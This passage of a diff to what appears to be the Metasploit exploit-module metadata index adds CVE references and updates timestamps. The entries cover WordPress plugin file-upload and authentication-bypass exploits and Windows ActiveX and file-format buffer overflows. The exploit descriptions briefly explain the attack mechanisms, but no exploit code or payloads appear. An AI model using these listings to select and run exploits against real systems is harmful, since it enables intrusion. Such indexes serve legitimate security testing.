    "description": "This module exploits an authentication bypass in the WordPress\n          InfiniteWP Client plugin to log in as an administrator and execute\n          arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n          The module will attempt to retrieve the original PLUGIN_FILE contents\n          and restore them after payload execution. If VerifyContents is set,\n          which is the default setting, the module will check to see if the\n          restored contents match the original.\n\n          Note that a valid administrator username is required for this module.\n\n          WordPress >= 4.9 is currently not supported due to a breaking WordPress\n          API change. Tested against 4.8.3.",
    "references": [
+      "CVE-2020-8772",
      "WPVDB-10011",
      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
@@ -140523,7 +141709,7 @@
    "targets": [
      "InfiniteWP Client < 1.9.4.5"
    ],
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
@@ -140678,6 +141864,7 @@
    ],
    "description": "WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker\n          to execute arbitrary PHP code. This flaw exists because the\n          /wp-content/plugins/wp-mobile-detector/resize.php script does contains a\n          remote file include for files not cached by the system already.\n          By uploading a .php file, the remote system will\n          place the file in a user-accessible path. Making a direct request to the\n          uploaded file will allow the attacker to execute the script with the privileges\n          of the web server.",
    "references": [
+      "CVE-2016-15043",
      "WPVDB-8505",
      "EDB-39891",
      "URL-https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/"
@@ -140703,7 +141890,7 @@
    "targets": [
      "wp-mobile-detectory < 3.6"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_mobile_detector_upload_execute",
@@ -140737,6 +141924,7 @@
    ],
    "description": "This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form\n          plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.",
    "references": [
+      "CVE-2015-10137",
      "URL-http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/",
      "WPVDB-7896"
    ],
@@ -140761,7 +141949,7 @@
    "targets": [
      "N-Media WebSite Contact Form 1.3.4"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_nmediawebsite_file_upload",
@@ -140974,6 +142162,7 @@
    ],
    "description": "This module uses an authentication bypass vulnerability in\n          Wordpress Plugin Pie Register <= 3.7.1.4 to generate a valid cookie.\n          With this cookie, hopefully of the admin, it will generate a plugin,\n          pack the payload into it and upload it to a server running WordPress.",
    "references": [
+      "CVE-2025-34077",
      "EDB-50395"
    ],
    "platform": "PHP",
@@ -140997,7 +142186,7 @@
    "targets": [
      "WordPress"
    ],
-    "mod_time": "2022-10-03 19:50:04 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_pie_register_bypass_rce",
@@ -141150,6 +142339,7 @@
    ],
    "description": "The WordPress Theme \"platform\" contains a remote code execution vulnerability\n          through an unchecked admin_init call. The theme includes the uploaded file\n          from its temp filename with php's include function.",
    "references": [
+      "CVE-2015-10143",
      "URL-http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html",
      "WPVDB-7762"
    ],
@@ -141174,7 +142364,7 @@
    "targets": [
      "platform < 1.4.4, platform pro < 1.6.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_platform_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_platform_exec",
@@ -141208,6 +142398,7 @@
    ],
    "description": "This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress\n          plugin. By abusing the uploadify.php file, a malicious user can upload a file to a\n          temp directory without authentication, which results in arbitrary code execution.",
    "references": [
+      "CVE-2012-10027",
      "OSVDB-82656",
      "BID-53787",
      "EDB-18987",
@@ -141235,7 +142426,7 @@
    "targets": [
      "wp-property <= 1.35.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_property_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_property_upload_exec",
@@ -141449,6 +142640,7 @@
    ],
    "description": "WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker\n          to execute arbitrary PHP code. This flaw exists because the\n          /wp-symposium/server/file_upload_form.php script does not properly verify or\n          sanitize user-uploaded files. By uploading a .php file, the remote system will\n          place the file in a user-accessible path. Making a direct request to the\n          uploaded file will allow the attacker to execute the script with the privileges\n          of the web server.",
    "references": [
+      "CVE-2014-10021",
      "OSVDB-116046",
      "WPVDB-7716"
    ],
@@ -141473,7 +142665,7 @@
    "targets": [
      "wp-symposium < 14.12"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_symposium_shell_upload",
@@ -141571,6 +142763,7 @@
    ],
    "description": "This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,\n          version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.",
    "references": [
+      "CVE-2015-10138",
      "WPVDB-7883",
      "EDB-36640",
      "PACKETSTORM-131294"
@@ -141596,7 +142789,7 @@
    "targets": [
      "Work The Flow 2.5.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_worktheflow_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_worktheflow_upload",
@@ -141691,6 +142884,7 @@
    ],
    "description": "This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin\n          from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote\n          code execution. This module has been tested successfully on WordPress WPshop eCommerce\n          1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.",
    "references": [
+      "CVE-2015-10135",
      "WPVDB-7830",
      "URL-https://research.g0blin.co.uk/g0blin-00036/"
    ],
@@ -141715,7 +142909,7 @@
    "targets": [
      "WPshop eCommerce 1.3.9.5"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_wpshop_ecommerce_file_upload",
@@ -141807,6 +143001,7 @@
    ],
    "description": "The Wordpress plugin \"MailPoet Newsletters\" (wysija-newsletters) before 2.6.8\n          is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme\n          functionality to upload a zip file containing the payload. The plugin uses the\n          admin_init hook, which is also executed for unauthenticated users when accessing\n          a specific URL. The first fix for this vulnerability appeared in version 2.6.7,\n          but the fix can be bypassed. In PHP's default configuration,\n          a POST variable overwrites a GET variable in the $_REQUEST array. The plugin\n          uses $_REQUEST to check for access rights. By setting the POST parameter to\n          something not beginning with 'wysija_', the check is bypassed. Wordpress uses\n          the $_GET array to determine the page, so it is not affected by this. The developers\n          applied the fixes to all previous versions too.",
    "references": [
+      "CVE-2014-4725",
      "URL-http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html",
      "URL-http://www.mailpoet.com/security-update-part-2/",
      "URL-https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php",
@@ -141833,7 +143028,7 @@
    "targets": [
      "wysija-newsletters < 2.6.8"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_wysija_newsletters_upload",
@@ -141867,6 +143062,7 @@
    ],
    "description": "This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers\n          can abuse the \"upload\" command in order to upload a malicious PHP file without any\n          authentication, which results in arbitrary code execution. The module has been\n          tested successfully on XODA 0.4.5 and Ubuntu 10.04.",
    "references": [
+      "CVE-2012-10045",
      "OSVDB-85117",
      "BID-55127",
      "EDB-20703"
@@ -141892,7 +143088,7 @@
    "targets": [
      "XODA 0.4.5"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/xoda_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/xoda_file_upload",
@@ -142287,6 +143483,7 @@
    ],
    "description": "This module exploits a vulnerability found in ZPanel's htpasswd module. When\n          creating .htaccess using the htpasswd module, the username field can be used to\n          inject system commands, which is passed on to a system() function for executing\n          the system's htpasswd command.\n\n          Please note: In order to use this module, you must have a valid account to login\n          to ZPanel.  An account part of any of the default groups should suffice, such as:\n          Administrators, Resellers, or Users (Clients).  By default, there's already a\n          'zadmin' user, but the password is randomly generated.",
    "references": [
+      "CVE-2013-10053",
      "OSVDB-94038",
      "URL-https://github.com/bobsta63/zpanelx/commit/fe9cec7a8164801e2b3755b7abeabdd607f97906",
      "URL-http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2"
@@ -142312,7 +143509,7 @@
    "targets": [
      "ZPanel 10.0.0.2 on Linux"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/webapp/zpanel_username_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/zpanel_username_exec",
@@ -142344,7 +143541,9 @@
      "xistence <xistence@0x90.nl>"
    ],
    "description": "This module exploits open X11 servers by connecting and registering a\n          virtual keyboard. The virtual keyboard is used to open an xterm or gnome\n          terminal and type and execute the specified payload.",
-    "references": [],
+    "references": [
+      "CVE-1999-0526"
+    ],
    "platform": "Unix",
    "arch": "cmd",
    "rport": 6000,
@@ -142354,7 +143553,7 @@
      "xterm (Generic)",
      "gnome-terminal (Ubuntu)"
    ],
-    "mod_time": "2025-05-04 16:24:31 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/x11/x11_keyboard_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/x11/x11_keyboard_exec",
@@ -143892,6 +145091,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n          r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n          the buffer and execute arbitrary code.",
    "references": [
+      "CVE-2006-6076",
      "OSVDB-68330",
      "URL-http://www.metasploit.com/users/mc"
    ],
@@ -143903,7 +145103,7 @@
    "targets": [
      "BrightStor ARCserve r11.5/Windows 2003"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/brightstor/tape_engine_0x8a.rb",
    "is_install_path": true,
    "ref_name": "windows/brightstor/tape_engine_0x8a",
@@ -145422,6 +146622,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n          class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n          By setting an overly long value to 'ConvertFile()', an attacker can overrun\n          a buffer and execute arbitrary code.",
    "references": [
+      "CVE-2007-5755",
      "OSVDB-54706",
      "BID-35028",
      "EDB-8733"
@@ -145434,7 +146635,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/aol_ampx_convertfile.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/aol_ampx_convertfile",
@@ -146794,6 +147995,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n          ActiveX Control provided by CommuniCrypt Mail 1.16.  By sending an overly\n          long string to the \"AddAttachments()\" method, an attacker may be able to\n          execute arbitrary code.",
    "references": [
+      "CVE-2010-20119",
      "OSVDB-64839",
      "EDB-12663"
    ],
@@ -146805,7 +148007,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/communicrypt_mail_activex.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/communicrypt_mail_activex",
@@ -147350,6 +148552,7 @@
    ],
    "description": "This module exploits a vulnerability in the Foxit Reader Plugin, it exists in\n          the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,\n          overly long query strings within URLs can cause a stack-based buffer overflow,\n          which can be exploited to execute arbitrary code. This exploit has been tested\n          on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281\n          (npFoxitReaderPlugin.dll version 2.2.1.530).",
    "references": [
+      "CVE-2013-10068",
      "OSVDB-89030",
      "BID-57174",
      "EDB-23944",
@@ -147364,7 +148567,7 @@
      "Automatic",
      "Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/foxit_reader_plugin_url_bof",
@@ -147492,6 +148695,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in Green Dam Youth Escort\n          version 3.17 in the way it handles overly long URLs.\n          By setting an overly long URL, an attacker can overrun a buffer and execute\n          arbitrary code. This module uses the .NET DLL memory technique by Alexander\n          Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.",
    "references": [
+      "CVE-2009-20008",
      "OSVDB-55126",
      "URL-http://web.archive.org/web/20110426190759/http://www.cse.umich.edu/~jhalderm/pub/gd/",
      "EDB-8938",
@@ -147505,7 +148709,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/greendam_url.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/greendam_url",
@@ -149607,6 +150811,7 @@
    ],
    "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n          Injection in such privileged/trusted browser zone can be used to modify\n          configuration settings and execute arbitrary commands.\n\n          Please note this module only works against specific versions of XCS. Currently,\n          we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.",
    "references": [
+      "CVE-2012-10032",
      "OSVDB-88191",
      "EDB-23225",
      "URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html"
@@ -149619,7 +150824,7 @@
    "targets": [
      "Maxthon 3 (prior to 3.3) on Windows"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/maxthon_history_xcs",
@@ -153682,6 +154887,7 @@
    ],
    "description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The \"exec\"\n          function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n          on the victim machine.",
    "references": [
+      "CVE-2011-10028",
      "OSVDB-71559",
      "EDB-17105"
    ],
@@ -153693,7 +154899,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/real_arcade_installerdlg",
@@ -154565,6 +155771,7 @@
    ],
    "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n          component, specifically PDF_IN_1.ocx.  When a long string of data is given\n          to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n          argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n          class pointer saved on the stack, resulting in arbitrary code execution under the\n          context of the user.\n\n          Also note that since the WinExec function is used to call the default browser,\n          you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n          exploit runs, another browser will pop up.\n\n          Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n          which is how the vulnerability was found and publicly disclosed.",
    "references": [
+      "CVE-2013-10057",
      "OSVDB-93754",
      "EDB-25835"
    ],
@@ -154578,7 +155785,7 @@
      "IE 7 on Windows XP SP3",
      "IE 8 on Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/synactis_connecttosynactis_bof",
@@ -154657,6 +155864,7 @@
    ],
    "description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n          sending an overly large/negative integer value to the AddSeries() property of\n          TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n          value and is later directly trusted and called upon.\n\n          This module has been designed to bypass DEP only under IE8 with Java support. Multiple\n          versions (including the latest version) are affected by this vulnerability that date\n          back to as far as 2001.\n\n          The following controls are vulnerable:\n\n          TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n          TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n          TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n          TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n          TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n          The controls are deployed under several SCADA based systems including:\n\n          Unitronics OPC server v1.3;\n          BACnet Operator Workstation Version 1.0.76",
    "references": [
+      "CVE-2011-4034",
      "OSVDB-74446",
      "URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow"
    ],
@@ -154671,7 +155879,7 @@
      "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
      "Windows 7 + JAVA + DEP bypass (IE8)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/teechart_pro.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/teechart_pro",
@@ -155617,6 +156825,7 @@
    ],
    "description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n          X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n          a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.",
    "references": [
+      "CVE-2025-34128",
      "EDB-35948",
      "URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/"
    ],
@@ -155628,7 +156837,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/x360_video_player_set_text_bof",
@@ -156542,6 +157751,7 @@
    ],
    "description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n          the application is used to import a specially crafted m3u file, a buffer overflow occurs\n          allowing arbitrary code execution.",
    "references": [
+      "CVE-2019-5618",
      "OSVDB-67241",
      "EDB-14676",
      "EDB-14681"
@@ -156554,7 +157764,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
@@ -156588,6 +157798,7 @@
    ],
    "description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n          occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n          of the user running the application. This module has been tested successfully on\n          ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.",
    "references": [
+      "CVE-2019-5621 ",
      "OSVDB-75096",
      "EDB-25204"
    ],
@@ -156599,7 +157810,7 @@
    "targets": [
      "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/abbs_amp_lst",
@@ -156725,6 +157936,7 @@
    ],
    "description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n          a stack based buffer overflow in the \"Import Users from File\" function, due to the\n          insecure usage of strcpy while parsing the csv formatted file. The module creates a\n          .exp file that must be imported with ActiveFax Server. It must be imported with the\n          default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n          successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n          Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.",
    "references": [
+      "CVE-2012-10043",
      "OSVDB-85175",
      "EDB-20915",
      "URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html"
@@ -156737,7 +157949,7 @@
    "targets": [
      "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/actfax_import_users_bof",
@@ -156770,6 +157982,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n          sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n          an attacker may be able to execute arbitrary code. This control is not marked safe\n          for scripting, so choose your attack vector accordingly.",
    "references": [
+      "CVE-2008-20001",
      "OSVDB-64579",
      "URL-http://www.activepdf.com/products/serverproducts/webgrabber/"
    ],
@@ -156781,7 +157994,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/activepdf_webgrabber",
@@ -157689,6 +158902,7 @@
    ],
    "description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n          component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n          this data into a buffer using a strcpy function, which causes an overflow, and\n          results arbitrary code execution.",
    "references": [
+      "CVE-2011-10027",
      "OSVDB-70741",
      "EDB-16085"
    ],
@@ -157702,7 +158916,7 @@
      "AOL Desktop 9.6 on Windows XP SP3 - NX bypass",
      "AOL Desktop 9.6 on Windows 7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/aol_desktop_linktag",
@@ -157735,6 +158949,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n          By setting an overly long value to 'Import()', an attacker can overrun a buffer\n          and execute arbitrary code.\n\n          NOTE: This ActiveX control is NOT marked safe for scripting or initialization.",
    "references": [
+      "CVE-2010-10015",
      "OSVDB-61964",
      "EDB-11204",
      "URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/"
@@ -157747,7 +158962,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/aol_phobos_bof",
@@ -158067,6 +159282,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n          An attacker must send the file to victim and the victim must open the file.\n          Alternatively, it may be possible to execute code remotely via an embedded\n          PLS file within a browser when the PLS extension is registered to Audiotran.\n          This alternate vector has not been tested and cannot be exercised directly\n          with this module.",
    "references": [
+      "CVE-2009-0476",
      "EDB-14961"
    ],
    "platform": "Windows",
@@ -158077,7 +159293,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/audiotran_pls_1424",
@@ -158111,6 +159327,7 @@
    ],
    "description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n          Pro version 1.x.  An overflow occurs when the process copies the content of a\n          playlist file on to the stack, which may result arbitrary code execution under\n          the context of the user.",
    "references": [
+      "CVE-2011-4496",
      "OSVDB-77043",
      "EDB-18096"
    ],
@@ -158122,7 +159339,7 @@
    "targets": [
      "Aviosoft DTV Player 1.0.1.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/aviosoft_plf_buf",
@@ -158204,6 +159421,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n          Manager. The vulnerability exists in the parsing of the UserName\n          parameter in the NetConfig.ini file.\n\n          The module has been tested successfully against version\n          PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
    "references": [
+      "CVE-2013-10036",
      "OSVDB-98714",
      "EDB-28969"
    ],
@@ -158215,7 +159433,7 @@
    "targets": [
      "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -158249,6 +159467,7 @@
    ],
    "description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n          handling routine.  When supplying a string of input data embedded in a .plf file,\n          the MediaPlayerCtrl.dll component will try to extract a filename by using\n          PathFindFileNameA(), and then copies whatever the return value is on the stack by\n          using an inline strcpy.  As a result, if this input data is long enough, it can cause\n          a stack-based buffer overflow, which may lead to arbitrary code execution under the\n          context of the user.",
    "references": [
+      "CVE-2012-10031",
      "OSVDB-80896",
      "EDB-18693",
      "EDB-22931"
@@ -158261,7 +159480,7 @@
    "targets": [
      "BlazeVideo HDTV Player Pro v6.6.0.3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/blazedvd_hdtv_bof",
@@ -158437,6 +159656,7 @@
    ],
    "description": "This module exploits a buffer overflow in BS.Player 2.57. When\n          the playlist import is used to import a specially crafted m3u file,\n          a buffer overflow occurs allowing arbitrary code execution.",
    "references": [
+      "CVE-2010-10016",
      "OSVDB-82528",
      "EDB-15934"
    ],
@@ -158449,7 +159669,7 @@
      "Windows XP",
      "Windows 7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/bsplayer_m3u",
@@ -159008,6 +160228,7 @@
    ],
    "description": "This module exploits a stack based buffer overflow found\n          in Cytel Studio <= 9.0. The overflow is triggered during the\n          copying of strings to a stack buffer of 256 bytes.",
    "references": [
+      "CVE-2011-10015",
      "OSVDB-75991",
      "BID-49924",
      "URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt"
@@ -159020,7 +160241,7 @@
    "targets": [
      "Cytel Studio 9.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/cytel_studio_cy3",
@@ -159150,6 +160371,7 @@
    ],
